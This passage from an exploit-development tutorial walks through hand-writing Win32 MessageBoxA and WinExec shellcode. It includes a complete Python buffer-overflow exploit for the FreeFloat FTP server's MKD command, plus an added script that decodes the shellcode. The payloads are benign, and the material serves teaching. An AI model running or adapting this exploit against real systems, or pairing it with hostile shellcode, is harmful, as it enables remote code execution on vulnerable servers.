- Part 1: Introduction to Exploit Development
- Part 2: Saved Return Pointer Overflows
- Part 3: Structured Exception Handler (SEH)
- Part 4: Egg Hunters
- Part 5: Unicode 0x00410041
- Part 6: Writing WIN32 Shellcode
- Part 7: Return-Oriented Programming (ROP)
- Part 8: Heap Spraying, Part 1 (Overwriting EIP)
- Part 9: Heap Spraying, Part 2 (UAF)
- Part 10: Kernel Exploitation: Stack Overflow
- Part 11: Kernel Exploitation: Arbitrary Write (Write-What-Where)
- Part 12: Kernel Exploitation: NULL Pointer Dereference
- Part 13: Kernel Exploitation: Uninitialized Stack Variable
- Part 14: Kernel Exploitation: Integer Overflow
- Part 15: Kernel Exploitation: UAF
- Part 16: Kernel Exploitation: Pool Overflow
- Part 17: Kernel Exploitation: Arbitrary Write (Write-What-Where)
- Part 18: Kernel Exploitation: RS2 Bitmap Necromancy
- Part 19: Kernel Exploitation: Razer
MessageBoxA
Next we write the MessageBoxA shellcode. First, let's look at the function's parameters.

```
MessageBoxA: MSDN Structure:

Parameters:
int WINAPI MessageBox(               => address of MessageBoxA in user32.dll
    __in_opt HWND hWnd,              => 0x00000000 (NULL = No Window Owner)
    __in_opt LPCTSTR lpText,         => pointer to "Pop the box!"
    __in_opt LPCTSTR lpCaption,      => pointer to "b33f"
    __in UINT uType                  => 0x00000000 (MB_OK|MB_APPLMODAL)
);
```
This looks a little more involved, but nothing we can't handle. The difference from before is that there are now two ASCII strings to deal with.

First, use arwin to find the address of MessageBoxA in user32.dll:

```
arwin.exe user32.dll MessageBoxA
```
OK, lay out the strings just as before:

```
ASCII Text:
b33f
Pop the box!

Split Text into groups of 4 characters:
"b33f"
"Pop " "the " "box!"

Reverse the order of the character groups:
"b33f"
"box!" "the " "Pop "

Look on google for an ASCII to hex converter and convert each character while
maintaining the order:
"\x62\x33\x33\x66"
"\x62\x6F\x78\x21" "\x74\x68\x65\x20" "\x50\x6F\x70\x20"

To write these values to the stack simply add "\x68" in front of each group:
"\x68\x62\x33\x33\x66"  => PUSH "b33f"
"\x68\x62\x6F\x78\x21"  => PUSH "box!"
"\x68\x74\x68\x65\x20"  => PUSH "the "
"\x68\x50\x6F\x70\x20"  => PUSH "Pop "
```
That leaves two parameters, hWnd and uType. Both are simply 0x00000000, which is convenient: XOR-ing a register gives us that value, and we had to XOR a register anyway to get the \x00 terminator for the ASCII strings.
Here is the shellcode I wrote (of course, you can write your own; any correct version will do):

```
"\x33\xc0"              => XOR EAX,EAX        | Zero out EAX register
"\x50"                  => PUSH EAX           | Push EAX to have null-byte padding for "b33f"
"\x68\x62\x33\x33\x66"  => PUSH "b33f"        | Push the ASCII string to the stack
"\x8B\xCC"              => MOV ECX,ESP        | Put a pointer to lpCaption string in ECX
"\x50"                  => PUSH EAX           | Push EAX to have null-byte padding for "Pop the box!"
"\x68\x62\x6F\x78\x21"  => PUSH "box!"        \
"\x68\x74\x68\x65\x20"  => PUSH "the "        | Push the ASCII string to the stack
"\x68\x50\x6F\x70\x20"  => PUSH "Pop "        /
"\x8B\xD4"              => MOV EDX,ESP        | Put a pointer to lpText string in EDX
"\x50"                  => PUSH EAX           | Push uType=0x00000000
"\x51"                  => PUSH ECX           | Push lpCaption
"\x52"                  => PUSH EDX           | Push lpText
"\x50"                  => PUSH EAX           | Push hWnd=0x00000000
"\xBE\xEA\x07\x45\x7E"  => MOV ESI,7E4507EA   | Move the pointer to MessageBoxA() into ESI
"\xFF\xD6"              => CALL ESI           | Call MessageBoxA()
```
The screenshot below shows the parameters set up correctly; continuing execution pops the message box.
```python
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: FreeFloat FTP (MKD BOF)
# OS: WinXP PRO SP3
# Author: b33f (Ruben Boonen)
# Software: http://www.freefloat.com/software/freefloatftpserver.zip
#----------------------------------------------------------------------------------#
# This exploit was created for Part 6 of my Exploit Development tutorial
# series - http://www.fuzzysecurity.com/tutorials/expDev/6.html
#----------------------------------------------------------------------------------#
import socket
import sys

#----------------------------------------------------------------------------------#
# (*) WinExec
# (*) arwin.exe => Kernel32.dll - WinExec 0x7C862AED
# (*) MSDN Structure:
#
#     UINT WINAPI WinExec(           => PTR to WinExec
#         __in LPCSTR lpCmdLine,     => calc.exe
#         __in UINT uCmdShow         => 0x1
#     );
#
# Final Size => 26-bytes (metasploit version size => 227-bytes)
#----------------------------------------------------------------------------------#
WinExec = (
"\x33\xc0"              # XOR EAX,EAX
"\x50"                  # PUSH EAX => padding for lpCmdLine
"\x68\x2E\x65\x78\x65"  # PUSH ".exe"
"\x68\x63\x61\x6C\x63"  # PUSH "calc"
"\x8B\xC4"              # MOV EAX,ESP
"\x6A\x01"              # PUSH 1
"\x50"                  # PUSH EAX
"\xBB\xED\x2A\x86\x7C"  # MOV EBX,kernel32.WinExec
"\xFF\xD3")             # CALL EBX

#----------------------------------------------------------------------------------#
# (*) MessageBoxA
# (*) arwin.exe => user32.dll - MessageBoxA 0x7E4507EA
# (*) MSDN Structure:
#
#     int WINAPI MessageBox(         => PTR to MessageBoxA
#         __in_opt HWND hWnd,        => 0x0
#         __in_opt LPCTSTR lpText,   => Pop the box!
#         __in_opt LPCTSTR lpCaption,=> b33f
#         __in UINT uType            => 0x0
#     );
#
# Final Size => 39-bytes (metasploit version size => 287-bytes)
#----------------------------------------------------------------------------------#
MessageBoxA = (
"\x33\xc0"              # XOR EAX,EAX
"\x50"                  # PUSH EAX => padding for lpCaption
"\x68\x62\x33\x33\x66"  # PUSH "b33f"
"\x8B\xCC"              # MOV ECX,ESP => PTR to lpCaption
"\x50"                  # PUSH EAX => padding for lpText
"\x68\x62\x6F\x78\x21"  # PUSH "box!"
"\x68\x74\x68\x65\x20"  # PUSH "the "
"\x68\x50\x6F\x70\x20"  # PUSH "Pop "
"\x8B\xD4"              # MOV EDX,ESP => PTR to lpText
"\x50"                  # PUSH EAX - uType=0x0
"\x51"                  # PUSH ECX - lpCaption
"\x52"                  # PUSH EDX - lpText
"\x50"                  # PUSH EAX - hWnd=0x0
"\xBE\xEA\x07\x45\x7E"  # MOV ESI,USER32.MessageBoxA
"\xFF\xD6")             # CALL ESI

#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D
# 0x77c35459 : push esp # ret | msvcrt.dll
# shellcode at ESP => space 749-bytes
#----------------------------------------------------------------------------------#
buffer = "\x90"*20 + MessageBoxA
evil = "A"*247 + "\x59\x54\xC3\x77" + buffer + "C"*(749-len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.111.128', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()   # close() must be called; a bare "s.close" only references the method
```
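As an added analysis-side example (mine, not part of the original tutorial), the following Python 3 script does the reverse of the layout procedure above: it walks the handful of x86 encodings the two shellcodes use, rebuilds each stack string from the reversed PUSH order, and reports the hard-coded API address, the arguments in C order, the size and any of the listed bad bytes. It handles only this push-string idiom; the opcode tables and the `emulate`/`stack_string` names are my own, and both sample inputs are transcribed from the shellcode bytes on this page.

```python
import struct
from itertools import takewhile

# Constructed sample inputs: the tutorial's two shellcodes, hex transcribed from the page.
MESSAGEBOX_SC = bytes.fromhex("33c0 50 6862333366 8bcc 50 68626f7821 6874686520"
                              " 68506f7020 8bd4 50 51 52 50 beea07457e ffd6")
WINEXEC_SC = bytes.fromhex("33c0 50 682e657865 6863616c63 8bc4 6a01 50 bbed2a867c ffd3")
BADCHARS = b"\x00\x0a\x0d"                 # bad bytes listed for the FreeFloat FTP target
MOV_R_ESP = {0xC4: "eax", 0xCC: "ecx", 0xD4: "edx"}   # ModRM after 8B: MOV r32,ESP
MOV_R_IMM = {0xBB: "ebx", 0xBE: "esi"}                 # MOV r32,imm32
PUSH_R = {0x50: "eax", 0x51: "ecx", 0x52: "edx"}       # PUSH r32
CALL_R = {0xD6: "esi", 0xD3: "ebx"}                    # ModRM after FF: CALL r32
LENGTH = {0x33: 2, 0x68: 5, 0x6A: 2, 0x8B: 2, 0xBB: 5, 0xBE: 5, 0xFF: 2}  # else 1 byte

def stack_string(stack, top):
    """Read the NUL-terminated string a register copied from ESP points to: slot `top`
    is at the lowest address, so the earlier pushes follow it in memory."""
    raw = b"".join(takewhile(lambda s: isinstance(s, bytes), reversed(stack[:top + 1])))
    return raw.split(b"\x00", 1)[0].decode("ascii", "replace")

def resolve(stack, slot):
    """A ("ptr", index) slot is a saved ESP; anything else is a literal dword."""
    return stack_string(stack, slot[1]) if isinstance(slot, tuple) else struct.unpack("<I", slot)[0]

def emulate(sc):
    """Walk the push-string idiom; return the API address called, its arguments in C order
    (first argument = top of stack at the CALL), the size and any bad bytes present."""
    regs, stack, arg_base, i = {}, [], 0, 0
    while i < len(sc):
        op, modrm, imm = sc[i], (sc[i + 1] if i + 1 < len(sc) else None), sc[i + 1:i + 5]
        if op == 0x33 and modrm == 0xC0:          # XOR EAX,EAX: EAX becomes the NUL dword
            regs["eax"] = b"\x00" * 4
        elif op == 0x68:                          # PUSH imm32: four ASCII bytes of the string
            stack.append(imm)
        elif op == 0x6A:                          # PUSH imm8, sign-extended to a dword
            stack.append(struct.pack("<i", struct.unpack("<b", imm[:1])[0]))
        elif op in PUSH_R:                        # PUSH r32: NUL padding or a saved pointer
            stack.append(regs[PUSH_R[op]])
        elif op == 0x8B and modrm in MOV_R_ESP:   # MOV r32,ESP: pointer to the string just built
            regs[MOV_R_ESP[modrm]] = ("ptr", len(stack) - 1)
            arg_base = len(stack)                 # everything pushed from here on is an argument
        elif op in MOV_R_IMM:                     # MOV r32,imm32: absolute API address
            regs[MOV_R_IMM[op]] = struct.unpack("<I", imm)[0]
        elif op == 0xFF and modrm in CALL_R:      # CALL r32: report the call and stop
            return {"target": regs[CALL_R[modrm]], "size": len(sc),
                    "args": [resolve(stack, s) for s in reversed(stack[arg_base:])],
                    "badchars": sorted(set(sc) & set(BADCHARS))}
        else:
            raise ValueError("unhandled opcode 0x%02x at offset %d" % (op, i))
        i += LENGTH.get(op, 1)
    raise ValueError("no CALL reached")
```

Run against the page's MessageBoxA bytes it reports target 0x7E4507EA with arguments (0, "Pop the box!", "b33f", 0), which is exactly the MessageBox(hWnd, lpText, lpCaption, uType) call the tutorial sets up.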